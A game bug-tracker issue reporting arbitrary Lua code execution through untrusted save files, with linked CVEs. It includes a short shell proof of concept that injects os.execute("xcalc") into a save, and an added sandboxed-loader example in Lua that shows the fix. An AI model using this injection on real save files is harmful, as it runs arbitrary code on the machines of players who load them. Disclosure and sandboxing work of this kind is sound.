Issue953

Title: Lua code execution in loading untrusted save game
Priority: release-blocker
Status: resolved
Assigned To: fluzz
Keywords:
Linked issues: CVE-2020-14938: An issue was discovered in map.c, CVE-2020-14939: An issue was discovered in savestruct_internal.c (View: 968, 967)
Watchers: fluzz

Submitted on 2019-07-25 14h00 by mmmds, last changed by fluzz.

Messages
Author: mmmds Date: 2019-07-25 14h00
Save game files consist of a Lua script that is executed during load. Assuming that users may
load malicious save games, for example downloaded or received from other users,
arbitrary code may be executed on their machines.


savestruct_internal.c, void load_game_data(char *strin)

PoC:
CH="mmm"
gunzip $CH.sav.gz
sed -i -e '0,/^$/s/^$/os.execute("xcalc")/' $CH.sav
gzip $CH.sav

Loading the save will run xcalc.

Author: fluzz Date: 2020-06-29 13h52
see issue967

Author: fluzz Date: 2022-12-25 16h56
Fixed in commit e106cec2c
Lua sandboxing added
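
The thread closes with "Lua sandboxing added". The following is an added example of that idea, not the code from commit e106cec2c and not the project's own loader: a save chunk is loaded with a restricted environment so that the tampered file from the report is rejected instead of executed. It assumes Lua 5.2 or later (for the `env` argument of `load`); the function name `load_save_sandboxed`, the constructor name `player` and the sample save text are hypothetical.

```lua
-- Added example, not the project's code. Assumes Lua 5.2+.
-- The `player` record constructor and the sample save text are hypothetical.

local function load_save_sandboxed(text)
  local records = {}

  -- Environment visible to the save chunk: data constructors only.
  -- os, io, require, load, dofile, debug and _G are not reachable from it.
  local env = {
    player = function(t) records[#records + 1] = t end,
  }

  -- Mode "t" accepts source text only; precompiled bytecode is refused
  -- because malformed bytecode can escape an environment-based sandbox.
  local chunk, err = load(text, "=savegame", "t", env)
  if not chunk then
    return nil, "parse error: " .. tostring(err)
  end

  -- Any reference to a global outside `env` resolves to nil, so a call such
  -- as os.execute(...) raises an error here instead of running.
  local ok, run_err = pcall(chunk)
  if not ok then
    return nil, "rejected: " .. tostring(run_err)
  end
  return records
end

-- Constructed sample inputs: a benign save and the same save with the
-- line from the report's PoC prepended.
local benign   = 'player{ name = "mmm", hp = 60 }'
local tampered = 'os.execute("xcalc")\n' .. benign

local recs = assert(load_save_sandboxed(benign))
print("benign save loaded:", recs[1].name, recs[1].hp)

local result, reason = load_save_sandboxed(tampered)
print("tampered save:", result, reason)
```

A restricted environment does not bound CPU or memory use, and string methods stay reachable through the string metatable, so a loader for untrusted saves also needs resource limits.
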
History
Date                 User   Action  Args
2022-12-25 16:56:59  fluzz  set     status: open -> resolved
                                    messages: + msg3774
2021-11-13 22:33:14  fluzz  link    issue968 linked
2021-11-13 22:32:53  fluzz  set     linked: + CVE-2020-14938: An issue was discovered in map.c
2021-11-13 16:49:55  fluzz  link    issue967 linked
2021-11-13 16:49:52  fluzz  set     linked: + CVE-2020-14939: An issue was discovered in savestruct_internal.c
2021-11-05 13:19:17  fluzz  set     assignedto: fluzz
                                    nosy: + fluzz
2021-11-05 10:53:20  fluzz  set     priority: bug -> release-blocker
2020-06-29 13:52:32  fluzz  set     messages: + msg3696
2019-07-25 14:00:46  mmmds  create